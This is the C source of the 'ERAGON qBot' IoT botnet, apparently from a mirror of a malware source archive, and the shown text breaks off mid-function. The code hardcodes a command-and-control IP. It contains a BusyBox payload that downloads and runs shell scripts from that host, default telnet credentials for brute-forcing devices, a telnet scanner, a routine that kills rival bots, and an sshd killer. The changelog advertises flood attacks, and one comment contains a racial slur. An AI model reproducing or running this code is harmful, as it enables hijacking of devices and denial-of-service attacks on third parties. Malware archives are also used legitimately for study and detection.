mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
1913 lines
71 KiB
C
1913 lines
71 KiB
C
/*
|
|
ERAGON qBot
|
|
[ CHANGELOG ]
|
|
|
|
1.0:
|
|
HTTPHEX ATTACK (OP)
|
|
AMAZING HTTP FLOOD
|
|
Telnet SREP
|
|
Build Detector
|
|
Server / Device Detector
|
|
GOOD STD FLOOD
|
|
All working attack methods (Common)
|
|
|
|
2.0:
|
|
Nameserver Updater
|
|
Device Cleaner
|
|
Port Closer (TO OP TAKEN OUT)
|
|
Botkiller Introduced(Not added still broke)
|
|
*/
|
|
|
|
#include <stdlib.h>
|
|
#include <stdarg.h>
|
|
#include <stdio.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <netdb.h>
|
|
#include <signal.h>
|
|
#include <strings.h>
|
|
#include <string.h>
|
|
#include <sys/utsname.h>
|
|
#include <unistd.h>
|
|
#include <fcntl.h>
|
|
#include <errno.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/udp.h>
|
|
#include <netinet/tcp.h>
|
|
#include <sys/wait.h>
|
|
#include <sys/ioctl.h>
|
|
#include <net/if.h>
|
|
#include <time.h>
|
|
#include <dirent.h>
|
|
#include <ctype.h>
|
|
#include <sys/prctl.h>
|
|
#define VERSION "Eragon v2"
|
|
#define PAD_RIGHT 1
|
|
#define PAD_ZERO 2
|
|
#define PRINT_BUF_LEN 12
|
|
#define PR_SET_NAME 15
|
|
#define PHI 0x9e3779b9
|
|
#define CMD_IAC 255
|
|
#define CMD_WILL 251
|
|
#define CMD_WONT 252
|
|
#define CMD_DO 253
|
|
#define CMD_DONT 254
|
|
#define OPT_SGA 3
|
|
#define STD2_SIZE 65
|
|
#define STD_PIGZ 69
|
|
#define BUFFER_SIZE 1024
|
|
#define SERVER_LIST_SIZE (sizeof(ServerInfo) / sizeof(unsigned char *))
|
|
// Credit to Scar for all these Builds
|
|
char *getBuild() {
|
|
#if defined(__x86_64__) || defined(_M_X64)
|
|
return "x86_64";
|
|
#elif defined(__i386) || defined(__i386__) || defined(_M_IX86)
|
|
return "x86_32";
|
|
#elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
|
|
return "ARM-4";
|
|
#elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
|
|
return "ARM-5"
|
|
#elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_) || defined(__ARM_ARCH_6J_) || defined(__ARM_ARCH_6M_)
|
|
return "ARM-6";
|
|
#elif defined(__ARM_ARCH_7_) || defined(__ARM_ARCH_7A__) || defined(__ARM_ARCH_7R__) || defined(__ARM_ARCH_7M__)
|
|
return "ARM-7";
|
|
#elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
|
|
return "MIPS";
|
|
#elif defined(__sh__)
|
|
return "SUPERH";
|
|
#elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
|
|
return "POWERPC";
|
|
#else
|
|
return "UNKNOWN";
|
|
#endif
|
|
}
|
|
char *getBuildz()
|
|
{
|
|
if(access("/usr/bin/python", F_OK) != -1){
|
|
return "SERVER";
|
|
} else {
|
|
return "DEVICE";
|
|
}
|
|
}
|
|
const char *useragents[] = {
|
|
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
|
|
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
|
|
"Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
|
|
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
|
|
"Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
|
|
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
|
|
"Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
|
|
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
|
|
"Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
|
|
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
|
|
"Mozilla/5.0 (PLAYSTATION 3; 3.55)",
|
|
"Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
|
|
"wii libnup/1.0",
|
|
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
|
|
"PSP (PlayStation Portable); 2.00",
|
|
"Bunjalloo/0.7.6(Nintendo DS;U;en)",
|
|
"Doris/1.15 [en] (Symbian)",
|
|
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
|
|
"BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
|
|
"Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
|
|
"Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
|
|
"Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
|
|
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
|
|
"Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
|
|
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
|
|
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
|
|
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
|
|
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
|
|
"SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
|
|
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
|
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
|
|
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
|
|
"MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
|
|
"Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
|
|
"Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
|
|
"MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
|
|
};
|
|
// ---------------------- EDIT SECTION -------------------------------------------------------------------
|
|
#define PRINTS // If you define you sir are a nigger
|
|
#define Server_Botport 27
|
|
unsigned char *ServerInfo[] = {"80.211.79.50:27"}; // please dont reck my botport.. change it xD
|
|
char *BusyBoxPayload = "cd /tmp/; /bin/busybox wget http://80.211.79.50/bins.sh; chmod +x bins.sh; sh bins.sh; tftp -r tftp1.sh -g 80.211.79.50; chmod +x tftp1.sh; sh tftp1.sh; rm -rf *";
|
|
char *usernames[] = { // add telnet passes maybe...
|
|
"root\0", //root:
|
|
"root\0", //root:admin
|
|
"admin\0", //admin:admin
|
|
"root\0", //root:default
|
|
|
|
};
|
|
|
|
char *passwords[] = {
|
|
"\0", //root:
|
|
"admin\0", // root:admin
|
|
"admin\0", // admin:admin
|
|
"default\0", // root:default
|
|
|
|
};
|
|
// -------------------------- STOP EDITING! ------------------------------------------------------------------
|
|
char *tmpdirs[] = {"/dev/netslink/", "/tmp/", "/var/", "/dev/", "/var/run/", "/dev/shm/", "/mnt/", "/boot/", "/usr/", "/opt/", (char*)0};
|
|
char *advances[] = {":", "ogin", "sername", "assword", (char*)0};
|
|
char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
|
|
char *successes[] = {"busybox", "$", "#", (char*)0};
|
|
char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
|
|
int botnetServer = -1;
|
|
uint32_t *pids;
|
|
uint32_t botnetPid;
|
|
uint64_t numpids = 0;
|
|
struct in_addr ourIP;
|
|
struct in_addr ourPublicIP;
|
|
unsigned char macAddress[6] = {0};
|
|
char *inet_ntoa(struct in_addr in);
|
|
int KadenCommStock = 0;
|
|
int botnetPrint(int sock, char *formatStr, ...);
|
|
static uint32_t Q[4096], c = 362436;
|
|
char *Bot_Killer_Binarys[] = { //this has not been added yet... https://www.youtube.com/watch?v=dQw4w9WgXcQ
|
|
"mips", //1
|
|
"mipsel", //2
|
|
"sh4", //3
|
|
"x86", //4
|
|
"i686", //5
|
|
"ppc", //6
|
|
"i586", //7
|
|
"i586", //8
|
|
"jackmymips", //9
|
|
"jackmymips64", //10
|
|
"jackmymipsel", //11
|
|
"jackmysh2eb", //12
|
|
"jackmysh2elf", //13
|
|
"jackmysh4", //14
|
|
"jackmyx86", //15
|
|
"jackmyarmv5", //16
|
|
"jackmyarmv4tl", //17
|
|
"jackmyarmv4", //18
|
|
"jackmyarmv6", //19
|
|
"jackmyi686", //20
|
|
"jackmypowerpc", //21
|
|
"jackmypowerpc440fp", //22
|
|
"jackmyi586", //23
|
|
"jackmym68k", //24
|
|
"jackmysparc", //25
|
|
"hackmymips", //26
|
|
"hackmymipsel", //27
|
|
"hackmysh4", //28
|
|
"hackmyx86", //29
|
|
"hackmyarmv6", //30
|
|
"hackmyi686", //31
|
|
"hackmypowerpc", //32
|
|
"hackmyi586", //33
|
|
"hackmym68k", //34
|
|
"hackmysparc", //35
|
|
"arm" //36
|
|
"armv5l" //37
|
|
"armv6l" //38
|
|
"b1", //39
|
|
"b2", //40
|
|
"b3", //41
|
|
"b4", //42
|
|
"b5", //43
|
|
"b6", //44
|
|
"b7", //45
|
|
"b8", //46
|
|
"b9", //47
|
|
"busyboxterrorist", //48
|
|
"DFhxdhdf", //49
|
|
"dvrHelper", //50
|
|
"FDFDHFC", //51
|
|
"FEUB", //52
|
|
"FTUdftui", //53
|
|
"GHfjfgvj", //54
|
|
"jackmyarmv5l", //55
|
|
"jackmyarmv6l", //56
|
|
"jackmyarv6", //57
|
|
"jackmymips", //58
|
|
"jackmymipsel", //59
|
|
"jackmyx86", //60
|
|
"jhUOH", //61
|
|
"JIPJIPJj", //62
|
|
"JIPJuipjh", //63
|
|
"kmyx86_64", //64
|
|
"lolmipsel", //65
|
|
"mips", //66
|
|
"mipsel", //67
|
|
"RYrydry",
|
|
"telarmv6l",
|
|
"telmips", //70
|
|
"telmipsel",
|
|
"telx86",
|
|
"TwoFacearmv61",
|
|
"TwoFacei586",
|
|
"TwoFacei686", //75
|
|
"TwoFacem86k",
|
|
"TwoFacemips",
|
|
"TwoFacemipsel",
|
|
"TwoFacepowerpc",
|
|
"TwoFacesh4", //80
|
|
"TwoFacesparc",
|
|
"TwoFacex86_64",
|
|
"UYyuyioy",
|
|
"wget",
|
|
"x86_64", //85
|
|
"XDzdfxzf",
|
|
"xxb1",
|
|
"xxb2",
|
|
"xxb3",
|
|
"xxb4", //90
|
|
"xxb5",
|
|
"xxb6",
|
|
"xxb7",
|
|
"xxb8",
|
|
"xxb9", //95
|
|
"sh",
|
|
"1",
|
|
"2",
|
|
"3",
|
|
"4", //100
|
|
"5",
|
|
"6",
|
|
"7",
|
|
"8",
|
|
"9", //105
|
|
"10",
|
|
"11",
|
|
"12",
|
|
"13",
|
|
"14", //110
|
|
"15",
|
|
"16",
|
|
"17",
|
|
"18",
|
|
"19", //115
|
|
"20"
|
|
"botmips",
|
|
"botmipsel",
|
|
"botsh4",
|
|
"botx86_64",//120
|
|
"botarmv6l",
|
|
"boti686",
|
|
"botpowerpc",
|
|
"boti586",
|
|
"botm68k",//125
|
|
"botsparc",
|
|
"botarmv4l",
|
|
"botarmv5l",
|
|
"botpowerpc440fp"
|
|
"botmipsfinal", //130
|
|
"botmipselfinal",
|
|
"botsh4final",
|
|
"botx86_64final",
|
|
"botarmv6lfinal",
|
|
"boti686final", //135
|
|
"botpowerpcfinal",
|
|
"boti586final",
|
|
"botm68kfinal",
|
|
"botsparcfinal",
|
|
"botarmv4lfinal", //140
|
|
"botarmv5lfinal",
|
|
"botpowerpc440fpfinal", //142
|
|
"mirai.x86",
|
|
"mirai.mips",
|
|
"mirai.mpsl", //145
|
|
"mirai.arm",
|
|
"mirai.arm5n",
|
|
"mirai.arm7",
|
|
"mirai.ppc",
|
|
"mirai.spc", //150
|
|
"mirai.m68k", //151
|
|
"mirai.sh4", //152
|
|
"miraint.x86",
|
|
"miraint.mips",
|
|
"miraint.mpsl", //155
|
|
"miraint.arm",
|
|
"miraint.arm5n",
|
|
"miraint.arm7",
|
|
"miraint.ppc",
|
|
"miraint.spc", //160
|
|
"miraint.m68k",
|
|
"miraint.sh4" //162
|
|
"bot.x86",
|
|
"bot.mips",
|
|
"bot.mpsl", //165
|
|
"bot.arm",
|
|
"bot.arm5n",
|
|
"bot.arm7",
|
|
"bot.ppc",
|
|
"bot.spc", //170
|
|
"bot.m68k",
|
|
"bot.sh4",
|
|
"botnt.x86",
|
|
"botnt.mips",
|
|
"botnt.mpsl", //175
|
|
"botnt.arm",
|
|
"botnt.arm5n",
|
|
"botnt.arm7",
|
|
"botnt.ppc", //180
|
|
"botnt.spc",
|
|
"botnt.m68k",
|
|
"botnt.sh4" //183
|
|
};
|
|
|
|
/*Bot Killer*/
|
|
char buf;
|
|
char input[1024];
|
|
char output[1024];
|
|
|
|
void bot_killer()
|
|
{
|
|
int i = 0;
|
|
for(i = 0; i < 184; i++) //the condition number must be one higher, then the last number.
|
|
{
|
|
sprintf(buf, "kill -9 %s\r\n", Bot_Killer_Binarys[i]);
|
|
system(buf);
|
|
}
|
|
return 0;
|
|
}
|
|
void port_closer() {
|
|
//openssh port closer
|
|
system("killall -9 sshd;pkill -9 sshd");
|
|
sprintf(input, "ps -C sshd -o pid=");
|
|
system(input);
|
|
strcpy(input, output);
|
|
sprintf(buf, "kill -9 %s", output);
|
|
system(buf);
|
|
|
|
}
|
|
void init_rand(uint32_t x) {
|
|
int i;
|
|
Q[0] = x;
|
|
Q[1] = x + PHI;
|
|
Q[2] = x + PHI + PHI;
|
|
for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
|
}
|
|
uint32_t rand_cmwc(void) {
|
|
uint64_t t, a = 18782LL;
|
|
static uint32_t i = 4095;
|
|
uint32_t x, r = 0xfffffffe;
|
|
i = (i + 1) & 4095;
|
|
t = a * Q[i] + c;
|
|
c = (uint32_t)(t >> 32);
|
|
x = t + c;
|
|
if (x < c) {
|
|
x++;
|
|
c++;
|
|
}
|
|
return (Q[i] = r - x);
|
|
}
|
|
static uint32_t x, y, z, w;
|
|
void rand_init(void) {
|
|
x = time(NULL);
|
|
y = getpid() ^ getppid();
|
|
z = clock();
|
|
w = z ^ y;
|
|
}
|
|
uint32_t rand_next(void) {
|
|
uint32_t t = x;
|
|
t ^= t << 11;
|
|
t ^= t >> 8;
|
|
x = y; y = z; z = w;
|
|
w ^= w >> 19;
|
|
w ^= t;
|
|
return w;
|
|
}
|
|
void rand_str(char *str, int len) {
|
|
while (len > 0) {
|
|
if (len >= 4) {
|
|
*((uint32_t *)str) = rand_next();
|
|
str += sizeof (uint32_t);
|
|
len -= sizeof (uint32_t);
|
|
}
|
|
else if (len >= 2) {
|
|
*((uint16_t *)str) = rand_next() & 0xFFFF;
|
|
str += sizeof (uint16_t);
|
|
len -= sizeof (uint16_t);
|
|
} else {
|
|
*str++ = rand_next() & 0xFF;
|
|
len--;
|
|
}
|
|
}
|
|
}
|
|
void rand_alphastr(uint8_t *str, int len) {
|
|
const char alphaset[] = "yvr4rxgp60fgvmeerwaxqbum8aea9z4"; //31 chars
|
|
while (len > 0) {
|
|
if (len >= sizeof (uint32_t)) {
|
|
int i;
|
|
uint32_t entropy = rand_next();
|
|
for (i = 0; i < sizeof (uint32_t); i++) {
|
|
uint8_t tmp = entropy & 0xff;
|
|
entropy = entropy >> 8;
|
|
tmp = tmp >> 3;
|
|
*str++ = alphaset[tmp];
|
|
}
|
|
len -= sizeof (uint32_t);
|
|
} else {
|
|
*str++ = rand_next() % (sizeof (alphaset));
|
|
len--;
|
|
}
|
|
}
|
|
}
|
|
int util_strlen(char *str) {
|
|
int c = 0;
|
|
while (*str++ != 0)
|
|
c++;
|
|
return c;
|
|
}
|
|
void util_memcpy(void *dst, void *src, int len) {
|
|
char *r_dst = (char *)dst;
|
|
char *r_src = (char *)src;
|
|
while (len--)
|
|
*r_dst++ = *r_src++;
|
|
}
|
|
int util_strcpy(char *dst, char *src) {
|
|
int l = util_strlen(src);
|
|
util_memcpy(dst, src, l + 1);
|
|
return l;
|
|
}
|
|
static void printchar(unsigned char **str, int c) {
|
|
if (str) {
|
|
**str = c;
|
|
++(*str);
|
|
}
|
|
else (void)write(1, &c, 1);
|
|
}
|
|
unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd) {
|
|
int got = 1, total = 0;
|
|
while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
|
|
return got == 0 ? NULL : buffer;
|
|
}
|
|
static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
|
|
register int pc = 0, padchar = ' ';
|
|
if (width > 0) {
|
|
register int len = 0;
|
|
register const unsigned char *ptr;
|
|
for (ptr = string; *ptr; ++ptr) ++len;
|
|
if (len >= width) width = 0;
|
|
else width -= len;
|
|
if (pad & PAD_ZERO) padchar = '0';
|
|
}
|
|
if (!(pad & PAD_RIGHT)) {
|
|
for ( ; width > 0; --width) {
|
|
printchar (out, padchar);
|
|
++pc;
|
|
}
|
|
}
|
|
for ( ; *string ; ++string) {
|
|
printchar (out, *string);
|
|
++pc;
|
|
}
|
|
for ( ; width > 0; --width) {
|
|
printchar (out, padchar);
|
|
++pc;
|
|
}
|
|
return pc;
|
|
}
|
|
static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
|
|
unsigned char print_buf[PRINT_BUF_LEN];
|
|
register unsigned char *s;
|
|
register int t, neg = 0, pc = 0;
|
|
register unsigned int u = i;
|
|
if (i == 0) {
|
|
print_buf[0] = '0';
|
|
print_buf[1] = '\0';
|
|
return prints (out, print_buf, width, pad);
|
|
}
|
|
if (sg && b == 10 && i < 0) {
|
|
neg = 1;
|
|
u = -i;
|
|
}
|
|
s = print_buf + PRINT_BUF_LEN-1;
|
|
*s = '\0';
|
|
while (u) {
|
|
t = u % b;
|
|
if( t >= 10 )
|
|
t += letbase - '0' - 10;
|
|
*--s = t + '0';
|
|
u /= b;
|
|
}
|
|
if (neg) {
|
|
if( width && (pad & PAD_ZERO) ) {
|
|
printchar (out, '-');
|
|
++pc;
|
|
--width;
|
|
} else {
|
|
*--s = '-';
|
|
}
|
|
}
|
|
return pc + prints (out, s, width, pad);
|
|
}
|
|
static int print(unsigned char **out, const unsigned char *format, va_list args ) {
|
|
register int width, pad;
|
|
register int pc = 0;
|
|
unsigned char scr[2];
|
|
for (; *format != 0; ++format) {
|
|
if (*format == '%') {
|
|
++format;
|
|
width = pad = 0;
|
|
if (*format == '\0') break;
|
|
if (*format == '%') goto out;
|
|
if (*format == '-') {
|
|
++format;
|
|
pad = PAD_RIGHT;
|
|
}
|
|
while (*format == '0') {
|
|
++format;
|
|
pad |= PAD_ZERO;
|
|
}
|
|
for ( ; *format >= '0' && *format <= '9'; ++format) {
|
|
width *= 10;
|
|
width += *format - '0';
|
|
}
|
|
if( *format == 's' ) {
|
|
register char *s = (char *)va_arg( args, intptr_t );
|
|
pc += prints (out, s?s:"(null)", width, pad);
|
|
continue;
|
|
}
|
|
if( *format == 'd' ) {
|
|
pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
|
|
continue;
|
|
}
|
|
if( *format == 'x' ) {
|
|
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
|
|
continue;
|
|
}
|
|
if( *format == 'X' ) {
|
|
pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
|
|
continue;
|
|
}
|
|
if( *format == 'u' ) {
|
|
pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
|
|
continue;
|
|
}
|
|
if( *format == 'c' ) {
|
|
scr[0] = (unsigned char)va_arg( args, int );
|
|
scr[1] = '\0';
|
|
pc += prints (out, scr, width, pad);
|
|
continue;
|
|
}
|
|
} else {
|
|
out:
|
|
printchar (out, *format);
|
|
++pc;
|
|
}
|
|
}
|
|
if (out) **out = '\0';
|
|
va_end( args );
|
|
return pc;
|
|
}
|
|
int szprintf(unsigned char *out, const unsigned char *format, ...) {
|
|
va_list args;
|
|
va_start( args, format );
|
|
return print( &out, format, args );
|
|
}
|
|
int botnetPrint(int sock, char *formatStr, ...) {
|
|
unsigned char *textBuffer = malloc(2048);
|
|
memset(textBuffer, 0, 2048);
|
|
char *orig = textBuffer;
|
|
va_list args;
|
|
va_start(args, formatStr);
|
|
print(&textBuffer, formatStr, args);
|
|
va_end(args);
|
|
orig[strlen(orig)] = '\n';
|
|
int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
|
|
free(orig);
|
|
return q;
|
|
}
|
|
void trim(char *str) {
|
|
int i;
|
|
int begin = 0;
|
|
int end = strlen(str) - 1;
|
|
while (isspace(str[begin])) begin++;
|
|
while ((end >= begin) && isspace(str[end])) end--;
|
|
for (i = begin; i <= end; i++) str[i - begin] = str[i];
|
|
str[i - begin] = '\0';
|
|
}
|
|
int getHost(unsigned char *toGet, struct in_addr *i) {
|
|
struct hostent *h;
|
|
if((i->s_addr = inet_addr(toGet)) == -1) return 1;
|
|
return 0;
|
|
}
|
|
int recvLine(int socket, unsigned char *buf, int bufsize) {
|
|
memset(buf, 0, bufsize);
|
|
fd_set myset;
|
|
struct timeval tv;
|
|
tv.tv_sec = 30;
|
|
tv.tv_usec = 0;
|
|
FD_ZERO(&myset);
|
|
FD_SET(socket, &myset);
|
|
int selectRtn, retryCount;
|
|
if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
|
|
while(retryCount < 10) {
|
|
tv.tv_sec = 30;
|
|
tv.tv_usec = 0;
|
|
FD_ZERO(&myset);
|
|
FD_SET(socket, &myset);
|
|
if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
|
|
retryCount++;
|
|
continue;
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
unsigned char tmpchr;
|
|
unsigned char *cp;
|
|
int count = 0;
|
|
cp = buf;
|
|
while(bufsize-- > 1) {
|
|
if(recv(KadenCommStock, &tmpchr, 1, 0) != 1) {
|
|
*cp = 0x00;
|
|
return -1;
|
|
}
|
|
*cp++ = tmpchr;
|
|
if(tmpchr == '\n') break;
|
|
count++;
|
|
}
|
|
*cp = 0x00;
|
|
return count;
|
|
}
|
|
int connectTimeout(int fd, char *host, int port, int timeout) {
|
|
struct sockaddr_in dest_addr;
|
|
fd_set myset;
|
|
struct timeval tv;
|
|
socklen_t lon;
|
|
int valopt;
|
|
long arg = fcntl(fd, F_GETFL, NULL);
|
|
arg |= O_NONBLOCK;
|
|
fcntl(fd, F_SETFL, arg);
|
|
dest_addr.sin_family = AF_INET;
|
|
dest_addr.sin_port = htons(port);
|
|
if(getHost(host, &dest_addr.sin_addr)) return 0;
|
|
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
|
|
int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
|
|
if (res < 0) {
|
|
if (errno == EINPROGRESS) {
|
|
tv.tv_sec = timeout;
|
|
tv.tv_usec = 0;
|
|
FD_ZERO(&myset);
|
|
FD_SET(fd, &myset);
|
|
if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
|
|
lon = sizeof(int);
|
|
getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
|
|
if (valopt) return 0;
|
|
}
|
|
else return 0;
|
|
}
|
|
else return 0;
|
|
}
|
|
arg = fcntl(fd, F_GETFL, NULL);
|
|
arg &= (~O_NONBLOCK);
|
|
fcntl(fd, F_SETFL, arg);
|
|
return 1;
|
|
}
|
|
int listFork() {
|
|
uint32_t parent, *newpids, i;
|
|
parent = fork();
|
|
if (parent <= 0) return parent;
|
|
numpids++;
|
|
newpids = (uint32_t*)malloc((numpids + 1) * 4);
|
|
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
|
|
newpids[numpids - 1] = parent;
|
|
free(pids);
|
|
pids = newpids;
|
|
return parent;
|
|
}
|
|
struct telstate_t {
|
|
int fd;
|
|
unsigned int ip;
|
|
unsigned char state;
|
|
unsigned char complete;
|
|
unsigned char usernameInd;
|
|
unsigned char passwordInd;
|
|
unsigned char tempDirInd;
|
|
unsigned int totalTimeout;
|
|
unsigned short bufUsed;
|
|
char *sockbuf;
|
|
};
|
|
const char* get_telstate_host(struct telstate_t* telstate) {
|
|
struct in_addr in_addr_ip;
|
|
in_addr_ip.s_addr = telstate->ip;
|
|
return inet_ntoa(in_addr_ip);
|
|
}
|
|
int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
|
|
int num_bytes, i;
|
|
memset(buffer, 0, buf_size);
|
|
num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
|
|
if(buffer[0] == 0xFF) {
|
|
negotiate(fd, buffer, 3);
|
|
}
|
|
if(contains_string(buffer, strings)) {
|
|
return 1;
|
|
}
|
|
return 0;
|
|
}
|
|
int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
|
|
fd_set read_set;
|
|
struct timeval tv;
|
|
tv.tv_sec = 0;
|
|
tv.tv_usec = timeout_usec;
|
|
FD_ZERO(&read_set);
|
|
FD_SET(fd, &read_set);
|
|
if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
|
|
return 0;
|
|
return recv(fd, buffer, buf_size, 0);
|
|
}
|
|
void advance_state(struct telstate_t* telstate, int new_state) {
|
|
if(new_state == 0) {
|
|
close(telstate->fd);
|
|
}
|
|
telstate->totalTimeout = 0;
|
|
telstate->state = new_state;
|
|
memset((telstate->sockbuf), 0, BUFFER_SIZE);
|
|
}
|
|
void reset_telstate(struct telstate_t* telstate) {
|
|
advance_state(telstate, 0);
|
|
telstate->complete = 1;
|
|
}
|
|
int contains_success(char* buffer) {
|
|
return contains_string(buffer, successes);
|
|
}
|
|
int contains_fail(char* buffer) {
|
|
return contains_string(buffer, fails);
|
|
}
|
|
int contains_response(char* buffer) {
|
|
return contains_success(buffer) || contains_fail(buffer);
|
|
}
|
|
int contains_string(char* buffer, char** strings) {
|
|
int num_strings = 0, i = 0;
|
|
for(num_strings = 0; strings[++num_strings] != 0; );
|
|
for(i = 0; i < num_strings; i++) {
|
|
if(strcasestr(buffer, strings[i])) {
|
|
return 1;
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
int negotiate(int sock, unsigned char *buf, int len) {
|
|
unsigned char c;
|
|
switch (buf[1]) {
|
|
case CMD_IAC: return 0;
|
|
case CMD_WILL:
|
|
case CMD_WONT:
|
|
case CMD_DO:
|
|
case CMD_DONT:
|
|
c = CMD_IAC;
|
|
send(sock, &c, 1, MSG_NOSIGNAL);
|
|
if (CMD_WONT == buf[1]) c = CMD_DONT;
|
|
else if (CMD_DONT == buf[1]) c = CMD_WONT;
|
|
else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
|
|
else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
|
|
send(sock, &c, 1, MSG_NOSIGNAL);
|
|
send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
|
|
break;
|
|
default:
|
|
break;
|
|
}
|
|
return 0;
|
|
}
|
|
int matchPrompt(char *bufStr) {
|
|
char *prompts = ":>%$#\0";
|
|
int bufLen = strlen(bufStr);
|
|
int i, q = 0;
|
|
for(i = 0; i < strlen(prompts); i++) {
|
|
while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
|
|
if(*(bufStr + bufLen - q) == prompts[i]) return 1;
|
|
}
|
|
return 0;
|
|
}
|
|
int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex) {
|
|
int bufferUsed = initialIndex, got = 0, found = 0;
|
|
fd_set myset;
|
|
struct timeval tv;
|
|
tv.tv_sec = timeout;
|
|
tv.tv_usec = timeoutusec;
|
|
unsigned char *initialRead = NULL;
|
|
